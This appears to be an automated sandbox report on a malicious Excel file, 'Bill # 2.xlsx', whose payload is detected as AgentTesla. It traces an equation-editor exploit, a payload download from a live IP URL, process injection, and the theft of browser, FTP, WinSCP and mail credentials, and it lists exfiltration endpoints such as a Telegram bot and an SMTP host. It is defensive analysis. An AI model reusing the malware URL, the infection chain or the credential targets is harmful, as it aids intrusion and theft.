                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -52792s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -52200s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -51700s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -51108s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -50608s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -36506s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -34104s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2196 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Last function: Thread delayed
                Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
                Source: C:\Users\Public\vbc.exe Code function: 4_2_003F00AD mov ecx, dword ptr fs:[00000030h] 4_2_003F00AD
                Source: C:\Users\Public\vbc.exe Code function: 4_2_003F00AD mov eax, dword ptr fs:[00000030h] 4_2_003F00AD
                Source: C:\Users\Public\vbc.exe Code function: 4_2_003F01CB mov eax, dword ptr fs:[00000030h] 4_2_003F01CB
                Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
                Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                Maps a DLL or memory area into another process
                Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                Writes to foreign memory regions
                Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: RegAsm.exe, 00000007.00000002.2360054157.0000000000EC0000.00000002.00000001.sdmp Binary or memory string: Program Manager
                Source: RegAsm.exe, 00000007.00000002.2360054157.0000000000EC0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                Source: RegAsm.exe, 00000007.00000002.2360054157.0000000000EC0000.00000002.00000001.sdmp Binary or memory string: !Progman
                Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                Yara detected AgentTesla
                Source: Yara match File source: 00000007.00000002.2360877305.00000000029FF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2167794246.0000000000462000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2170414969.0000000004127000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: vbc.exe PID: 2708, type: MEMORY
                Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2364, type: MEMORY
                Source: Yara match File source: 7.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 4.2.vbc.exe.460000.0.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Tries to steal Mail credentials (via file access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: Yara matchFile source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2364, type: MEMORY

                Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match; File source: 00000007.00000002.2360877305.00000000029FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2167794246.0000000000462000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2170414969.0000000004127000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: vbc.exe PID: 2708, type: MEMORY
Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 2364, type: MEMORY
Source: Yara match; File source: 7.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.vbc.exe.460000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Process Injection 212 | Disable or Modify Tools 11 | OS Credential Dumping 2 | File and Directory Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Obfuscated Files or Information 21 | Credentials in Registry 1 | System Information Discovery 114 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 2 | Security Account Manager | Security Software Discovery 11 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading 111 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 23 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 13 | LSA Secrets | Virtualization/Sandbox Evasion 13 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 212 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Network Configuration Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                Behavior Graph

[Behavior graph image not preserved. Behavior Graph ID: 321163, Sample: Bill # 2.xlsx, Startdate: 20/11/2020, Architecture: WINDOWS, Score: 100. Content recoverable from the graph:]

Sample signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Antivirus detection for URL or domain; 13 other signatures

EQNEDT32.EXE (started)
• Contacted: 198.23.212.152, 49167, 80, AS-COLOCROSSINGUS, United States
• Dropped: C:\Users\user\AppData\Local\...\tochi[1].exe, PE32
• Dropped: C:\Users\Public\vbc.exe, PE32
• Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
• Started: vbc.exe
  • Signatures: Machine Learning detection for dropped file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  • Started: RegAsm.exe
    • Contacted: elb097307-934924932.us-east-1.elb.amazonaws.com, 23.21.42.25, 443, 49168, AMAZON-AESUS, United States; us2.smtp.mailhostbox.com; 2 other IPs or domains
    • Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
  • Started: RegAsm.exe
    • Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
  • Started: RegAsm.exe

EXCEL.EXE (started)
• Dropped: C:\Users\user\Desktop\~$Bill # 2.xlsx, data


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

Source | Detection | Scanner | Label
Bill # 2.xlsx | 31% | Virustotal |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exe | 100% | Joe Sandbox ML |

Unpacked PE Files

Source | Detection | Scanner | Label
4.2.vbc.exe.460000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
7.2.RegAsm.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1138205

                Domains

                No Antivirus matches

                URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://198.23.212.152/doc/tochi.exe | 100% | Avira URL Cloud | malware
http://VaMNef.com | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://ns.a | 0% | Avira URL Cloud | safe
https://AkXBTiOq5oAkuzK9T5L.org | 0% | Avira URL Cloud | safe
https://api.ipify.orgGETMozilla/5.0 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
https://api.ipify.orgP | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

                Domains and IPs

                Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
elb097307-934924932.us-east-1.elb.amazonaws.com | 23.21.42.25 | true | false | | high
us2.smtp.mailhostbox.com | 208.91.198.143 | true | false | | high
api.ipify.org | unknown | unknown | false | | high

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://198.23.212.152/doc/tochi.exe | true | Avira URL Cloud: malware | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | RegAsm.exe, 00000007.00000002.2360808155.00000000029BA000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.2360822194.00000000029CA000.00000004.00000001.sdmp | false | | high
http://127.0.0.1:HTTP/1.1 | RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.entrust.net/server1.crl0 | RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmp | false | | high
http://us2.smtp.mailhostbox.com | RegAsm.exe, 00000007.00000002.2360976971.0000000002A96000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.entrust.net03 | RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://VaMNef.com | RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://elb097307-934924932.us-east-1.elb.amazonaws.com | RegAsm.exe, 00000007.00000002.2360843456.00000000029DD000.00000004.00000001.sdmp | false | | high
http://ns.a | vbc.exe, 00000004.00000003.2167387608.0000000004C74000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://AkXBTiOq5oAkuzK9T5L.org | RegAsm.exe, 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://api.ipify.orgGETMozilla/5.0 | RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://api.ipify.org | RegAsm.exe, 00000007.00000002.2360843456.00000000029DD000.00000004.00000001.sdmp | false | | high
https://api.ipify.org | RegAsm.exe, 00000007.00000002.2360808155.00000000029BA000.00000004.00000001.sdmp | false | | high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | RegAsm.exe, 00000007.00000002.2360145060.0000000002430000.00000002.00000001.sdmp | false | | high
https://api.telegram.org/bot%telegramapi%/ | vbc.exe, 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmp | false | | high
https://api.ipify.orgP | RegAsm.exe, 00000007.00000002.2360835164.00000000029D8000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.%s.comPA | RegAsm.exe, 00000007.00000002.2360145060.0000000002430000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://ocsp.entrust.net0D | RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegAsm.exe, 00000007.00000002.2360822194.00000000029CA000.00000004.00000001.sdmp | false | | high
https://secure.comodo.com/CPS0 | RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmp | false | | high
https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x | RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | vbc.exe, 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://servername/isapibackend.dll | RegAsm.exe, 00000007.00000002.2362741103.00000000067C0000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://crl.entrust.net/2048ca.crl0 | RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmp | false | | high

                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
23.21.42.25 | unknown | United States | 14618 | AMAZON-AESUS | false
198.23.212.152 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:321163
                                              Start date:20.11.2020
                                              Start time:13:46:20
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 6m 22s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:Bill # 2.xlsx
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winXLSX@10/10@3/2
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 5.9% (good quality ratio 5.2%)
                                              • Quality average: 53.8%
                                              • Quality standard deviation: 27.4%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 63
                                              • Number of non-executed functions: 1
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xlsx
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): dllhost.exe
                                              • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209, 8.241.122.126, 8.241.9.126, 8.248.147.254, 8.253.95.121, 8.253.204.120
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

Time | Type | Description
13:47:04 | API Interceptor | 131x Sleep call for process: EQNEDT32.EXE modified
13:47:09 | API Interceptor | 44x Sleep call for process: vbc.exe modified
13:47:18 | API Interceptor | 1125x Sleep call for process: RegAsm.exe modified

                                              Joe Sandbox View / Context

                                              IPs

Match | Associated Sample Name / URL | Detection | Context
23.21.42.25 | 908.exe | malicious | api.ipify.org/
23.21.42.25 | 0Oen62zpot.exe | malicious | api.ipify.org/
23.21.42.25 | Catalogue.exe | malicious | api.ipify.org/
23.21.42.25 | zMhsjuuCLk.exe | malicious | api.ipify.org/
198.23.212.152 | RFQ_SMKM19112020.xlsx | malicious | 198.23.212.152/doc/topo.exe
198.23.212.152 | Payment_Confirmation_Slip.xlsx | malicious | 198.23.212.152/doc/ogo.exe
198.23.212.152 | PI_SMK18112020.xlsx | malicious | 198.23.212.152/doc/mrtop.exe
198.23.212.152 | Purchase Order RFQ-HL51L07.xlsx | malicious | 198.23.212.152/doc/friend.exe

                                              Domains

Match | Associated Sample Name / URL | Detection | Context
us2.smtp.mailhostbox.com | PO1.xlsx | malicious | 208.91.199.223
us2.smtp.mailhostbox.com | QKLQkaCe9M.exe | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | 0hgHwEkIWY.exe | malicious | 208.91.198.143
us2.smtp.mailhostbox.com | Swift Copy.exe | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | Shipping Details_PDF.exe | malicious | 208.91.199.225
us2.smtp.mailhostbox.com | RFQ_SMKM19112020.xlsx | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | Order List.xlsx | malicious | 208.91.199.225
us2.smtp.mailhostbox.com | Shipping doc.pdf.exe | malicious | 208.91.198.143
us2.smtp.mailhostbox.com | OrV86zxFWHW1j0f.exe | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | XDMBhLJxD1Qf7JW.exe | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | me4qssWAMQ.exe | malicious | 208.91.199.225
us2.smtp.mailhostbox.com | Vd58qg0dhp.exe | malicious | 208.91.199.223
us2.smtp.mailhostbox.com | 15egpuWfT3.exe | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | Shipping Details.exe | malicious | 208.91.198.143
us2.smtp.mailhostbox.com | Wrong Transfer Payment - Chk Clip Copy.exe | malicious | 208.91.199.223
us2.smtp.mailhostbox.com | WireTransfer Copy767.exe | malicious | 208.91.199.225
us2.smtp.mailhostbox.com | DOH0003675550.pdf.exe | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | aviso de remesas_pdf__________________________________________.exe | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | Doc.exe | malicious | 208.91.199.223
us2.smtp.mailhostbox.com | SWIFT.exe | malicious | 208.91.199.223
elb097307-934924932.us-east-1.elb.amazonaws.com | PO1.xlsx | malicious | 174.129.214.20
elb097307-934924932.us-east-1.elb.amazonaws.com | a7UZzCVWKO.exe | malicious | 54.204.14.42
elb097307-934924932.us-east-1.elb.amazonaws.com | QKLQkaCe9M.exe | malicious | 50.19.252.36
elb097307-934924932.us-east-1.elb.amazonaws.com | sAPuJAvs52.exe | malicious | 54.243.161.145
elb097307-934924932.us-east-1.elb.amazonaws.com | JlgyVmPWZr.exe | malicious | 174.129.214.20
elb097307-934924932.us-east-1.elb.amazonaws.com | EIUOzWW2JX.exe | malicious | 174.129.214.20
elb097307-934924932.us-east-1.elb.amazonaws.com | RVAgYSH2qh.exe | malicious | 54.235.142.93
elb097307-934924932.us-east-1.elb.amazonaws.com | yCyc4rN0u8.exe | malicious | 54.235.83.248
elb097307-934924932.us-east-1.elb.amazonaws.com | 9cXAnovmQX.exe | malicious | 54.225.66.103
elb097307-934924932.us-east-1.elb.amazonaws.com | T2HDck1Mmy.exe | malicious | 54.235.142.93
elb097307-934924932.us-east-1.elb.amazonaws.com | Purchase Order.exe | malicious | 54.225.66.103
elb097307-934924932.us-east-1.elb.amazonaws.com | Payment Advice Note from 19.11.2020.exe | malicious | 23.21.126.66
elb097307-934924932.us-east-1.elb.amazonaws.com | phy__1__31629__2649094674__1605642612.exe | malicious | 23.21.126.66
elb097307-934924932.us-east-1.elb.amazonaws.com | BBVA confirming Aviso de pago Eur5780201120.exe | malicious | 54.204.14.42
elb097307-934924932.us-east-1.elb.amazonaws.com | Ejgvvuwuu8.exe | malicious | 54.225.169.28
elb097307-934924932.us-east-1.elb.amazonaws.com | PO N0.1500243224._PDF.exe | malicious | 54.204.14.42
                                              Avion Quotation Request.docGet hashmaliciousBrowse
                                              • 54.204.14.42
                                              zRHI9DJ0YKIPfBX.exeGet hashmaliciousBrowse
                                              • 54.235.182.194
                                              {REQUEST FOR QUOTATION-local lot.1,2,3,4,6container..exeGet hashmaliciousBrowse
                                              • 174.129.214.20
                                              chib(1).exeGet hashmaliciousBrowse
                                              • 54.225.153.147

                                              ASN

                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                              JA3 Fingerprints

                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                              Category:dropped
                                              Size (bytes):58936
                                              Entropy (8bit):7.994797855729196
                                              Encrypted:true
                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):326
                                              Entropy (8bit):3.123186963792904
                                              Encrypted:false
                                              SSDEEP:6:kK5CJwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:EmkPlE99SNxAhUegeT2
                                              MD5:AB6DA8AE6AA88FCEAE65300C795001E1
                                              SHA1:1CE227376FC49D31FB9F66A9C2FD0CF6121495F4
                                              SHA-256:DC99379FCEAA00E3BC2BF531C24C7A88ABDF449FDED25CA6423B1BEAD9658A91
                                              SHA-512:48E6343AEAC724E7182D4E869BCA918E33B6E00127146C33206FAFB91C6F80592F76287FA3FA99C456E58C6DC920ADE623449643E049F8C14B9985D5BCC1A27B
                                              Malicious:false
                                              Reputation:low
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):619008
                                              Entropy (8bit):7.862193874993034
                                              Encrypted:false
                                              SSDEEP:12288:U/bH8hDt8CFefzXYQ1pY5ucIaIGnrqhz2VLgBpVy:2ritb6jYQXLGnrqIVkBpV
                                              MD5:C11D6124EE0522C7AB71D20CF3474DC0
